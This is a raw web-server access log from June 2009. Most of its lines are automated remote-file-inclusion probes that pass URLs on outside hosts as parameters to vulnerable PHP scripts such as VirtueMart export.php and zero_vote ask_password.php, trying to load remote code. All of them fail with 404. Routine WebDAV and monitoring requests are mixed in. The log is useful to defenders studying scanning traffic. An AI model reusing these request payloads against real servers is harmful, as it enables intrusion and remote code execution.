216.139.67.116 - - [24/Jun/2009:07:31:16 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:16 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:16 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:31:19 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:31:19 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:31:19 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:19 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:19 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:19 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:20 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:21 -0400] "GET /logs/access_log.Q109051500%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:21 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:32 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:34 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:31:35 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:37 -0400] "GET /logs/access_log.Q109060400%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:37 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:37 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:37 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:31:45 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:31:51 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:31:51 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:31:51 -0400] "GET /logs/access_log.Q109052500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:31:51 -0400] "GET /logs/access_log.Q109052600%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:31:54 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:56 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:31:57 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:32:02 -0400] "GET /logs/access_log.Q109050800%20%20/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:32:03 -0400] "GET /logs/access_log.Q109050800%20%20/modules/My_eGallery/index.php?basepath=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:32:05 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:32:09 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
84.201.208.50 - - [24/Jun/2009:07:32:09 -0400] "GET /logs/access_log.Q109052500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:07:32:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:32:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:32:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
193.243.139.4 - - [24/Jun/2009:07:32:53 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:32:53 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:32:53 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:32:55 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:32:56 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:32:56 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
83.16.182.130 - - [24/Jun/2009:07:33:01 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:07:33:01 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
210.115.58.73 - - [24/Jun/2009:07:33:04 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:04 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:04 -0400] "GET /logs/access_log.Q109051500%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:07:33:07 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
123.242.165.138 - - [24/Jun/2009:07:33:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
210.115.58.73 - - [24/Jun/2009:07:33:09 -0400] "GET /logs/access_log.Q109051200%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:07:33:20 -0400] "GET /logs/error_log.Q109052400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:33:20 -0400] "GET /logs/error_log.Q109052400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
83.98.209.71 - - [24/Jun/2009:07:33:26 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:26 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:26 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:07:33:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [24/Jun/2009:07:33:46 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:48 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:48 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:48 -0400] "GET /logs/access_log.Q109051500%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:50 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:50 -0400] "GET /logs/access_log.Q109051200%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:50 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:33:52 -0400] "GET /logs/access_log.Q109051200%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:33:53 -0400] "GET /logs/access_log.Q109060400%20%20/bbs//skin/zero_vote/ask_password.php?dir=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.80 - - [24/Jun/2009:07:33:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:33:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:33:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [24/Jun/2009:07:33:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [24/Jun/2009:07:33:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [24/Jun/2009:07:33:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
87.230.22.39 - - [24/Jun/2009:07:34:44 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.230.22.39 - - [24/Jun/2009:07:34:44 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.230.22.39 - - [24/Jun/2009:07:34:44 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.230.22.39 - - [24/Jun/2009:07:34:54 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.140.142.39 - - [24/Jun/2009:07:35:07 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://rox-crime.no-ip.org:8080/mic22.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
210.4.77.148 - - [24/Jun/2009:07:35:38 -0400] "GET /logs/access_log.Q109052500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:35:38 -0400] "GET /logs/access_log.Q109052600//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:35:42 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:35:42 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:35:45 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:35:47 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:35:47 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:35:51 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:08 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:08 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:08 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:10 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:10 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:10 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:36:16 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:36:18 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.160.145 - - [24/Jun/2009:07:36:28 -0400] "GET /logs/access_log.Q109053000//poll/poll_ssi.php?include_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.160.145 - - [24/Jun/2009:07:36:28 -0400] "GET /logs//poll/poll_ssi.php?include_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:28 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:36:30 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
210.115.58.73 - - [24/Jun/2009:07:36:31 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:36:34 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
172.16.1.69 - - [24/Jun/2009:07:36:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [24/Jun/2009:07:36:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [24/Jun/2009:07:36:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.200.195.130 - - [24/Jun/2009:07:37:14 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:37:19 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
123.242.165.138 - - [24/Jun/2009:07:37:19 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
123.242.165.138 - - [24/Jun/2009:07:37:19 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
124.138.156.3 - - [24/Jun/2009:07:37:34 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:37:34 -0400] "GET /logs/access_log.Q109060900/mainbody.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:37:34 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:07:37:35 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:07:37:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905D4801D34900413006E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.29.190 - - [24/Jun/2009:07:38:22 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:38:25 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:07:38:31 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:38:35 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:07:38:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:38:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:38:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.161.199.102 - - [24/Jun/2009:07:38:38 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
172.16.1.80 - - [24/Jun/2009:07:38:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:38:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:38:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.161.199.102 - - [24/Jun/2009:07:38:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
209.59.12.99 - - [24/Jun/2009:07:38:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.161.199.102 - - [24/Jun/2009:07:38:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
172.16.1.180 - - [24/Jun/2009:07:39:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:39:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:39:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
